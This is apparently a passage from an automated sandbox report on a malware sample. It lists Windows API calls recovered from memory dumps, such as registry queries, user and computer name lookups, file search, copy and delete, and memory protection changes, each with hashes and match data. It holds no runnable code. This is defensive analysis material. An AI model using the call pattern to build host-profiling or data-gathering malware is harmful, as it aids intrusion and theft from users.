                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 167551676-0
                                                                                                                                                                                                                              • Opcode ID: cc177fe26eae2ecf3fe3dec7e34db2c5f369d94a1c7a89d5a12b5640fbaeea76
                                                                                                                                                                                                                              • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc177fe26eae2ecf3fe3dec7e34db2c5f369d94a1c7a89d5a12b5640fbaeea76
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                              • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                              • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6C01C947
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C01C969
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6C01C9A9
                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C01C9C8
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C01C9E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117587062.000000006C001000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117549990.000000006C000000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117761371.000000006C08E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117799562.000000006C092000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c000000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4191843772-0
                                                                                                                                                                                                                              • Opcode ID: b8b35fa69ae11898be42f0ab9c736238385a5ddfc01d87e29609bad70c4ed83f
                                                                                                                                                                                                                              • Instruction ID: b0031814a178a5f3200127cb711142bb0915f4e22753040ea6833af262c0bc4f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8b35fa69ae11898be42f0ab9c736238385a5ddfc01d87e29609bad70c4ed83f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E121DA317467146BDF14AAB4DC88BAEB3F9AB47744F504529F907A7A40DF6098048BA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F61C30), ref: 004129EB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                              • String ID: L0A
                                                                                                                                                                                                                              • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                              • Opcode ID: 9250cd257da4f1d81ade23adeb63a50ebf0b9af3f830724eb909d2792711b615
                                                                                                                                                                                                                              • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9250cd257da4f1d81ade23adeb63a50ebf0b9af3f830724eb909d2792711b615
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                              • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                              • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,02F5C500,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,02F65B30,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                              • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                              • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,02F5C110,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,02F650F8,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                              • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                              • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(02F61A30,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F65990,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(02F61A30,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                              • API String ID: 2929475105-3463377506
                                                                                                                                                                                                                              • Opcode ID: ed3454e25c9423e95906ddcdfb8aa2b8a27828ef3678f4780e14eb2c7f18e033
                                                                                                                                                                                                                              • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed3454e25c9423e95906ddcdfb8aa2b8a27828ef3678f4780e14eb2c7f18e033
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                              • API String ID: 544645111-3492212131
                                                                                                                                                                                                                              • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                              • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                              • Opcode ID: 5638474ecdd17819a2a886c24c0a46df4c87ffc9ef2feb8ef7b83979a2c482cc
                                                                                                                                                                                                                              • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5638474ecdd17819a2a886c24c0a46df4c87ffc9ef2feb8ef7b83979a2c482cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,02F5C110,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,02F650F8,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,02F65930,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02F61BC0), ref: 0041438F
                                                                                                                                                                                                                                • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,02F65930,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02F61BC0), ref: 00414396
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
